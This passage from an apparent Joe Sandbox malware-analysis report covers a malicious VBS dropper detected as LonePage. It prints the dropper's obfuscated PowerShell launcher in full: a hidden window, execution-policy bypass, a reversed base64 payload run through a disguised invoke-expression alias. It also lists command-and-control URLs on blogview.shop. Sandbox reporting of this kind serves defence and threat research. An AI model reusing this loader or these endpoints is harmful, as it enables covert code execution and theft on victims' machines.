5wyy1cdldgi8bsk3ujlugdnogciul2bq1ci9ayyyryo05wzpx2yiv2duqxzubcdjvmai9wl3vmb9swapryoxediwvwzsnxl0jxy0n3opmdnggxyt1ci1aibp1wlg02bk5wyy1cdldgkgaxzlx2ctqnchr3c7kzmgaxzlx2ctqnchr3c' ;$base64 = $best64code.tochararray() ; [array]::reverse($base64) ; -join $base64 2>&1> $null ;$loadcode = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($base64)) ;$pwn = 'inv'+'oke'+'-ex'+'pre'+'ssi'+'on' ; new-alias -name pwn -value $pwn -force ; pwn $loadcode ;
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oqf7ksewjhzkwyj2g2cljnzlj3lzvwdsfmdvkgch9ccvh2cucxzpz3zvxmyv8iozbhd0h2joegdhrgzh9gbwvnlrpwdksjnxacclvgbz1cdyfgdztdduvwasnmyldnl0vmbgq3ylpmyv1ydl5wprpwdksdmxacclvgbz1cdyfgdzttf7kybkpmykgyclrxecrxzh5comrxv6otxn5wak92yuvml0hxz05sblr3c5n3w9khcyrgjd11wlrxeit1on5wayr3ctqxdpxnbihgj9sybkpmyksjcrpgjggvrj1jbihgj7umbpx0dl5ko60fduvwbu9mcpznbf5sblr3c5n1wrkccprckzv2czvmckrwq0n3birxzhpjodnnbe5cdl5kltvgdzl3ub1zkvrmairyon0tpn0zkvrmairyop1wyvh2d98gzqjgj7v2csvwf7i3aqrciyvus9khcyrgjg0vxbvgd5j2w7lyj05wz052bj1cdld2jgg2y0fwbtaicrpgjoywa7ksbszgjocmbpjhdtrxzn5comrxd6otxn5wak92yuvml0hxz05sblr3c5n3w9i3aqryepedi0dwlgggdn5wzm5sbszgjoywa7kyyyrykn8inonxzyzwzy9im3ydn2ktn1uzn5utm3cdoxcjn48yclvhbhz3lpbxyva3bonnl3vwa2d2bsj2lvozcwrhdodckhrxykrwyvxmb39gzuswaprsptxmzkszj0hhduccirask99fjdjxyon2wgshi0nwzqj2btg2yhvmcvzgi8bsk1edi4fwbtasng4wat1cit9gzufmctqxznbck05wdvnwlg02bk5wyy1cdldgi8bsk3ujlugdnogciul2bq1ci9ayyyryo05wzpx2yiv2duqxzubcdjvmai9wl3vmb9swapryoxediwvwzsnxl0jxy0n3opmdnggxyt1ci1aibp1wlg02bk5wyy1cdldgkgaxzlx2ctqnchr3c7kzmgaxzlx2ctqnchr3c' ;$base64 = $best64code.tochararray() ; [array]::reverse($base64) ; -join $base64 2>&1> $null ;$loadcode = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($base64)) ;$pwn = 'inv'+'oke'+'-ex'+'pre'+'ssi'+'on' ; new-alias -name pwn -value $pwn -force ; pwn $loadcode ;Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected LonePage
        Source: Yara matchFile source: 00000002.00000002.2022092800.0000022501B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2022092800.000002250022E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2220, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected LonePage
        Source: Yara matchFile source: 00000002.00000002.2022092800.0000022501B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2022092800.000002250022E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2220, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information221
        Scripting        		Valid Accounts11
        Command and Scripting Interpreter        		221
        Scripting        		11
        Process Injection        		1
        Masquerading        		OS Credential Dumping1
        Security Software Discovery        		Remote ServicesData from Local System1
        Non-Application Layer Protocol        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		21
        Virtualization/Sandbox Evasion        		LSASS Memory1
        Process Discovery        		Remote Desktop ProtocolData from Removable Media1
        Application Layer Protocol        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts3
        PowerShell        		Logon Script (Windows)Logon Script (Windows)11
        Process Injection        		Security Account Manager21
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Deobfuscate/Decode Files or Information        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
        Obfuscated Files or Information        		LSA Secrets1
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Software Packing        		Cached Domain Credentials12
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        9jJ4aVtoHG.vbs16%ReversingLabsScript-WScript.Trojan.Laburrak

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://aka.ms/pscore680%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        s-part-0032.t-0009.t-msedge.net
        		13.107.246.60
        		truefalse
          		unknown
          blogview.shop
          		unknown
          		unknownfalse
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://blogview.shop/api/values/86718771597555964672/refresh6/Xpowershell.exe, 00000002.00000002.2022092800.000002250165A000.00000004.00000800.00020000.00000000.sdmpfalse
              		unknown
              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2036144414.0000022510070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2036144414.00000225101B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2022092800.000002250022E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2022092800.0000022501CB8000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2022092800.000002250022E000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://blogview.shop/api/values/86718771597555964672/refresh6/0213598674.txtpowershell.exe, 00000002.00000002.2022092800.000002250199A000.00000004.00000800.00020000.00000000.sdmpfalse
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2022092800.000002250022E000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  https://go.micropowershell.exe, 00000002.00000002.2022092800.0000022500F3F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://blogview.shop/api/values/refresh6powershell.exe, 00000002.00000002.2022092800.000002250022E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2022092800.0000022501B60000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    https://contoso.com/powershell.exe, 00000002.00000002.2022092800.0000022501CB8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2036144414.0000022510070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2036144414.00000225101B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2022092800.000002250022E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://blogview.shop/api/values/powershell.exe, 00000002.00000002.2022092800.0000022501B60000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://contoso.com/Licensepowershell.exe, 00000002.00000002.2022092800.0000022501CB8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://blogview.shop/api/values/86718771597555964672/refresh6/powershell.exe, 00000002.00000002.2022092800.000002250022E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2022092800.0000022501B60000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000002.00000002.2022092800.0000022501CB8000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://aka.ms/pscore68powershell.exe, 00000002.00000002.2022092800.0000022500001000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://blogview.shop/api/values/refresh6Xpowershell.exe, 00000002.00000002.2022092800.000002250165A000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          https://blogview.shoppowershell.exe, 00000002.00000002.2022092800.0000022501A0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2022092800.000002250199A000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2022092800.0000022500001000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2022092800.000002250022E000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown

                              World Map of Contacted IPs

                              No contacted IP infos

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1542811
                              Start date and time:2024-10-26 13:49:56 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 4m 21s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:11
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:9jJ4aVtoHG.vbs
                              renamed because original name is a hash value
                              Original Sample Name:1d291282d7cc027743634f374a5658267a3d1e7c7aa971135c4ec880c1ca7bba.vbs
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winVBS@4/4@1/0
                              EGA Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 7
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Found application associated with file extension: .vbs

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target powershell.exe, PID 2220 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: 9jJ4aVtoHG.vbs

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              07:50:51API Interceptor43x Sleep call for process: powershell.exe modified

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              s-part-0032.t-0009.t-msedge.netj6qRCRPE7S.ps1Get hashmaliciousMetasploitBrowse
                              • 13.107.246.60
                              https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                              • 13.107.246.60
                              https://docs.google.com/drawings/d/1agK-6fGF4y65hrPDNlHipoTNyumPU-yxdwKLkQWhsQI/preview?pli=1oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEGet hashmaliciousUnknownBrowse
                              • 13.107.246.60
                              https://link.edgepilot.com/s/8e0e5379/EMW5cxymxkqj1qgquAdAJg?u=https://1drv.ms/o/c/67a50aba8b4bc7df/Es0QkMhT9wJGqs_vzb8xaRQBgzED6dWk5_dCMe34N16rYQ?e=5%253aTtRWoI%26sharingv2=true%26fromShare=true%26at=9&c=E,1,DNZ_Csfpwg3nzWxVo2TSq2LzcEM3C6hdkfA-QbvL5dwYrcj0RsSt_vroZV-UqAThZkP5E_WMmdbQ82a_nveA3iNTPpg_CIcQxQFCbK60ykcRIVrxnkr2VnkbdtuE&typo=1Get hashmaliciousUnknownBrowse
                              • 13.107.246.60
                              https://23.245.109.208.host.secureserver.net/E5V7V5K0D7J7U1G8T1M8U3B4G7B4C0Y7M4M4N1J5K4K6Y6N5R4&c=E,1,OlGTQS9-XwC2vBMWr7I6ylXZJam5iCAEz8vCZAxOsyVrFii_1IhqZZqiTz_dLP-ondxd1F0_mQoffiXjC_RNTQQ_48xVwrK55zuEfYrxqUa2Wr6UOEIpqcM,&typo=1Get hashmaliciousUnknownBrowse
                              • 13.107.246.60
                              https://www.evernote.com/shard/s512/sh/13954171-1260-d858-de69-06ffb19cd62f/IpXIE2ZoTfkUL7pCMibo1Wvq-pGORrIcZV-gRtF0-ppZOJhbsY-7OG4AYQ__;!!A-_UObntj2w!TCF-dwwxew6_4xwX0vz37obzz_Nme89BLzz0LCDHIEcMt0H-fDdV9LeqXfzP36mva0iIJhqBnntAwfDFEkCvUyHvgSgA8Q$Get hashmaliciousHTMLPhisherBrowse
                              • 13.107.246.60
                              SecuriteInfo.com.Win64.MalwareX-gen.25687.22409.exeGet hashmaliciousUnknownBrowse
                              • 13.107.246.60
                              https://realestatemania.ca/kxyNao-7Ms6e-WBJnj-uMnVb-7gZJL-v8aOp.phpGet hashmaliciousUnknownBrowse
                              • 13.107.246.60
                              SecuriteInfo.com.Win64.MalwareX-gen.30431.3723.exeGet hashmaliciousUnknownBrowse
                              • 13.107.246.60
                              Quarantined Messages (1).zipGet hashmaliciousHTMLPhisherBrowse
                              • 13.107.246.60

                              ASNs

                              No context

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):9434
                              Entropy (8bit):4.928515784730612
                              Encrypted:false
                              SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                              MD5:D3594118838EF8580975DDA877E44DEB
                              SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                              SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                              SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):1.1940658735648508
                              Encrypted:false
                              SSDEEP:3:NlllulJnp/p:NllU
                              MD5:BC6DB77EB243BF62DC31267706650173
                              SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                              SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                              SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:@...e.................................X..............@..........

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0jigbwgv.vwm.psm1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x5g10b5x.hjp.ps1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              Static File Info

                              General

                              File type:ASCII text, with very long lines (1397), with CRLF, LF line terminators
                              Entropy (8bit):6.014151856690367
                              TrID:
                                File name:9jJ4aVtoHG.vbs
                                File size:1'465 bytes
                                MD5:4d31ff6d1763029cdc976dea87df875f
                                SHA1:d1c84b2ccbfcaec63a44f618969382eacbbdf158
                                SHA256:1d291282d7cc027743634f374a5658267a3d1e7c7aa971135c4ec880c1ca7bba
                                SHA512:18d3438981509aacdb8f2014e02fd565f1cfc3b63356cc297417a6ec03b0017e1e3f123695782b9d6bd2257b2e25c481fa3f3c8821979d2b9c26bfec160824e4
                                SSDEEP:24:2jXxfM8BJ7gg291OLXEqSMMh5LpXQNUR6p22xOs3JLU4RWzv:U68BJ7gX92UL5PxQNUQv3JLS
                                TLSH:E631C46E9054D83A2A9B8664CE54142CFD7AE67D4280A4833356F7BECC9874BD3021AC
                                File Content Preview:dim r, c.set r = createobject("WScript.Shell").c = "powershell.exe -executionpolicy bypass -w hidden -noprofile -c $best64code = '=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYl

                                File Icon

                                Icon Hash:68d69b8f86ab9a86

                                Network Behavior

                                Network Port Distribution

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 26, 2024 13:51:55.419464111 CEST6308853192.168.2.91.1.1.1
                                Oct 26, 2024 13:51:55.443382978 CEST53630881.1.1.1192.168.2.9

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Oct 26, 2024 13:51:55.419464111 CEST192.168.2.91.1.1.10xca00Standard query (0)blogview.shopA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Oct 26, 2024 13:50:43.893289089 CEST1.1.1.1192.168.2.90x83a2No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                Oct 26, 2024 13:50:43.893289089 CEST1.1.1.1192.168.2.90x83a2No error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                Oct 26, 2024 13:51:55.443382978 CEST1.1.1.1192.168.2.90xca00Server failure (2)blogview.shopnonenoneA (IP address)IN (0x0001)false

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:07:50:48
                                Start date:26/10/2024
